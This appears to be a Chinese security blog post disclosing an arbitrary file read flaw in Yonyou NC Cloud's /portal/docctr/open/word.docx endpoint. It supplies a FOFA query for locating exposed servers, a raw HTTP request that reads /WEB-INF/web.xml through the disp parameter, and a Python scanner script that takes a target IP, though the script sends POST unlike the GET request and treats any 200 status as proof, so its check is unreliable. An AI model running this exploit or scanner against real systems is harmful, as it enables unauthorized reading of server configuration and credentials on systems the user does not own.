当前位置: 首页 > article >正文

用友NC word.docx接口存在任意文件读取漏洞

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、产品介绍

用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。

二、漏洞描述

用友NC Cloud word.docx接口存在任意文件读取漏洞

三、fofa语法

body="UClient.dmg"

四、漏洞复现


poc

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

五、poc.py

import requests


def verify(ip):
    url = f'{ip}/portal/docctr/open/word.docx?disp=/WEB-INF/web.xml'

    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept': ' * / *',
        'Connection': 'Keep - Alive'
    }

    try:
        response = requests.post(url, headers=headers)
        print(response)
        # 验证成功输出相关信息
        if response.status_code == 200:
            print(f"{ip}存在用友NC word.docx接口任意文件读取漏洞!!!")
        else:
            print('漏洞不存在')

    except Exception as e:
        pass

if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)


http://www.kler.cn/a/161480.html

相关文章:

  • 性能优化、安全
  • Ubuntu安装MySQL8
  • 【VBA实战】用Excel制作排序算法动画续
  • 沃飞长空郭亮博士荣获中国航空航天月桂奖
  • C++ QT 工具日志异步分批保存
  • Redis主从复制(replication)
  • git的使用:基础配置和命令行
  • 智能优化算法应用:基于社交网络算法无线传感器网络(WSN)覆盖优化 - 附代码
  • Linux篇:进程间通信
  • [linux进程控制]进程替换
  • class036 二叉树高频题目-上-不含树型dp【算法】
  • java设计模式学习之【组合模式】
  • hql面试题之字符串使用split分割,并选择其中的一部分字段的问题
  • /usr/bin/ld: cannot find -ltinfo 的解决方法
  • 第二十一章——网络通信
  • 使用Jython将Python代码转换为Java可执行文件
  • 手把手将Visual Studio Code变成Python开发神器
  • RabbitMQ 的七种消息传递形式
  • 结构体对齐和补齐
  • HarmonyOS开发(十):通知和提醒
  • 洛谷P1044 [NOIP2003 普及组] 栈 递归方法
  • JVM中 Minor GC 和 Full GC 的区别
  • React中的空标签与Fragment标签的区别
  • 【数据库设计和SQL基础语法】--表的创建与操作--插入、更新和删除数据
  • Nginx(配置SLL证书)
  • 重生奇迹mu武器镶嵌顺序